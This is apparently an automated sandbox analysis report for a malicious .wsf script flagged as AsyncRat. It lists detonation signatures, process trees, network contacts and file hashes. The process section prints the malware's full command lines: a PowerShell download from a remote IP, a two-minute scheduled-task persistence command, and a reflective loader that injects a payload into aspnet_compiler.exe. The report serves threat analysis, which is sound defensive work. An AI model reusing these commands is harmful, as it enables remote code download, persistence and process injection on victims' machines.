Analysis Overview
SHA256
68abac9468d8751819413ce014642d97d7857462306126d6c9a938ae722bda69
Threat Level: Known bad
The file תיק החקירה.wsf was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Blocklisted process makes network request
Checks computer location settings
Executes dropped EXE
Suspicious use of SetThreadContext
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Modifies registry class
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-28 14:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-28 14:01
Reported
2024-06-28 14:04
Platform
win7-20240611-en
Max time kernel
118s
Max time network
119s
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2564 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2564 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2564 wrote to memory of 2796 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\תיק החקירה.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -Command "Start-BitsTransfer -Source 'http://109.199.101.109:770/1002.jpg' -Destination 'C:\Users\Public\bbbb.zip'; Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public\'"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 109.199.101.109:770 | 109.199.101.109 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-28 14:01
Reported
2024-06-28 14:04
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
148s
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2640 set thread context of 4372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\תיק החקירה.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -Command "Start-BitsTransfer -Source 'http://109.199.101.109:770/1002.jpg' -Destination 'C:\Users\Public\bbbb.zip'; Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public\'"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4572,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=4168 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
C:\Users\Public\AutoHotkey.exe
"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[System.Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',[Byte[]]$result)); "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Users\Public\AutoHotkey.exe
C:\\Users\\Public\\AutoHotkey.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[System.Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',[Byte[]]$result)); "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 109.199.101.109:770 | 109.199.101.109 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.101.199.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| DE | 109.199.101.109:770 | 109.199.101.109 | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | word2.webredirect.org | udp |
| DE | 109.199.101.109:1002 | word2.webredirect.org | tcp |
| DE | 109.199.101.109:1002 | word2.webredirect.org | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wv4kw5z5.eah.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\Auto.vbs
| MD5 | 1b86ac4c78166fdc657b6ac7c9519761 |
| SHA1 | 62c6acb48467dc21d2bccc44b0069690dc65fd4d |
| SHA256 | fa790a55aac779658064f7ce83cee26b84c424e3fe9002ce854d1a142dcb5633 |
| SHA512 | 482be9eae47c42f7bcbc328bd3f38f476cee5da4ccad5b56133997ce3c0474abc179ecef4dd5a7e60de6177068be19e9fbf7e81895b067e3dd59d3d264c94389 |
C:\Users\Public\node.bat
| MD5 | 52dc8ab7250ca32c7dea8867d6464e5b |
| SHA1 | 4e3202f42632fa8a2c1c632af80b8223b9ada385 |
| SHA256 | b99b7a8864e07ed15ba3e11ec6e5ad793d3a8e257321c89c7c2b7842cc674728 |
| SHA512 | f43a7fc7e9d57f46eb08a8d84dde6503b5fd65c1f2e4a28f80ca700ca2050506c05b09ad52e092c6b46f094a079580bbd863cf04ff0ea3db589d2527218ef985 |
C:\Users\Public\AutoHotkey.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Public\AutoHotkey
| MD5 | 4347a6be90f50fa6d2b840b429a9563b |
| SHA1 | 988e58ea6b12cc4eff037cb4b69ce0824de6081a |
| SHA256 | 7c8a123e9a3afd0df3193b07c32fe68b07409f2ced5db80f5b93125cf5961f08 |
| SHA512 | 76ee9ecfe034f8c77ab0773a4f0a704a35bb043d3038503e4238dd7294730f43e18f28c1653c220895730ce764f1362fea74cf2c5dde3d374dc315cf46c51517 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | e5ab5d093e49058a43f45f317b401e68 |
| SHA1 | 120da069a87aa9507d2b66c07e368753d3061c2d |
| SHA256 | 4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74 |
| SHA512 | d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 176e06d925350cd4e4fe35470be810d9 |
| SHA1 | 60e4033d866f64faa490dad93552ec221a7c3db9 |
| SHA256 | 1db23e1c00caceb52423a6e78b3923eb6cbde8fc9c5ca86ae88b717a433ddbb4 |
| SHA512 | 6f661ba92185d85329b119944ec5098bb0b05d2c00ed3353b5a21639caef921033634706083fe7b7a8d09a65d71b7f4e9d07b4f33740a30d38ef6b7fc21d50b1 |
C:\Users\Public\runpe.txt
| MD5 | 7044d392ceb5669de318f1deb11cfd66 |
| SHA1 | c9ddff7f4d14b3c9e3b55673da885fb5951944e8 |
| SHA256 | 6b54452e750818739847993e973e8c4cc9ab42fd2ebbe5c919228e34043554c1 |
| SHA512 | aff117f62f4f16ee5679e725caff28ebabffb2c24cdd248b13245bb7c55f25da7494b7e41ad3bd01dde59c55f0d52211dfbe0c77c1db5167a78649937c6a7dcb |
C:\Users\Public\msg.txt
| MD5 | 5b40f06d02914fbc374f8bbf2228eb33 |
| SHA1 | b5582251566e3942fac3f8fc31fb176771025c64 |
| SHA256 | 90480c389a4de82ba8d4dde40522b34bb4cd770eb423fe45eb988c36791ddf1e |
| SHA512 | d8ab3ef5eb850c07e50c10ab06de9ddeec7d432b7521711c63e6bf662cfd1c5172acfae76814f6764c5e0d85fd3c3c53ca0ec890529000c1943e848c190bcdb8 |
C:\Users\Public\Gettype.txt
| MD5 | 9221b7b54ed96de7281d31f8ae35be6a |
| SHA1 | 223fad426aa8c753546501b0643ee1720b57bff0 |
| SHA256 | 8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a |
| SHA512 | be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d |
C:\Users\Public\load.txt
| MD5 | ec4d1eb36b22d19728e9d1d23ca84d1c |
| SHA1 | 5dbc716c4600097b85b9e51d6aeb77a4363b03ed |
| SHA256 | 0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0 |
| SHA512 | d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700 |
C:\Users\Public\Invoke.txt
| MD5 | 5fb833d20ef9f93596f4117a81523536 |
| SHA1 | d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5 |
| SHA256 | e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73 |
| SHA512 | afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35 |
C:\Users\Public\Execute.txt
| MD5 | 720d2a3ed7e16367c31bbca2a6c5c924 |
| SHA1 | 9c58ec9c24bea197af824d0b78678d7188a348c7 |
| SHA256 | 0bfa2b7d3d1a1a671c126dc0aa12a7e3a28e5d3b54ab668783e08cafedafbc3a |
| SHA512 | 0f694d314315eeb5e3d5d8f21619537cd7723203274c98730937c1a02498ca4e4b6d6dce7d25003c3f7a4725995c96cc12e3daffbab20b10de788dd4d330b622 |
C:\Users\Public\NewPE2.txt
| MD5 | 6aa09883f5176f1b1696b2a27d89146a |
| SHA1 | b258abd44ce2f9281802a6f51d5fe283aaaab74a |
| SHA256 | ceebdf25f96dda93a3a2117d59ac847823b591abbebadcbb36182b50ab625c70 |
| SHA512 | 7c08f8135817962d4ec5b3e0d88371807f88dea037cf46b7187957d55d6e7b0fadc57c1f14b8b07c33b126655bbabe8b9f3f21ff6914737c105a91381fecdb9d |
C:\Users\Public\getMethod.txt
| MD5 | db37f91f128a82062af0f39f649ea122 |
| SHA1 | f21110ae7ac7cde74e7aa59b22ed10bace35b06b |
| SHA256 | e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32 |
| SHA512 | 681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2eb89531251cc009c6fc9287f0b4528a |
| SHA1 | 59ee6b887a7c617ec43612d9d40d24c3d707042d |
| SHA256 | bcc67a890072b5037b2196ba3f6c9d8250820e1ba358eaea75749c70a6cd906d |
| SHA512 | 91d07f61f9c8740bc7cfc6c498414336ee04fba31a87afca285172ddbec138c469e5de25363028205d3d415a891b87e9711ffb5e4b49d367c72ac919c5294433 |